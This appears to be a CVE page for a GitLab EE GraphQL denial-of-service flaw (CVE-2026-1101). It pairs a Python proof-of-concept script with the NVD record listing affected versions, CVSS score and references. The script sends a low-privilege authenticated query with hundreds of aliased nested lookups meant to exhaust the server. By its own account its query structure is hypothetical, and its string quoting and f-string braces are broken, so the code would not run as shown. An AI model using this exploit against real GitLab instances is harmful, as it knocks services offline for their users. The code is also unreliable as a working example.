CVE-2026-1101

#!/usr/bin/env python3 import requests # Conceptual PoC for CVE-2026-1101 # This script demonstrates how a malicious GraphQL query might be sent. # Actual payload would depend on the specific vulnerable schema. target_url = "https://gitlab.example.com/api/graphql" token = "YOUR_AUTH_TOKEN" # Low privilege user token # Malicious query designed to cause resource exhaustion (e.g., deep nesting or alias explosion) # Note: The specific query structure is hypothetical based on "improper input validation" malicious_query = """ query { project(fullPath: "root/test-project") { %s } } "" % "\n ".join([f"issue{i}: issues { nodes { title author { name } } }" for i in range(500)]) headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } payload = { "query": malicious_query, "variables": {} } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) print(f"Status Code: {response.status_code}") print("Response snippet:", response.text[:200]) except requests.exceptions.RequestException as e: print(f"Request failed (possible DoS): {e}")

{"cve": {"id": "CVE-2026-1101", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:57.667", "lastModified": "2026-04-14T14:05:39.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.2", "versionEndExcluding": "18.8.9", "matchCriteriaId": "DE6B64C1-04D6-4E07-A730-72DD62AB9443"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/586488", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3460228", "source": "[email protected]", "tags": ["Permissions Required"]}]}}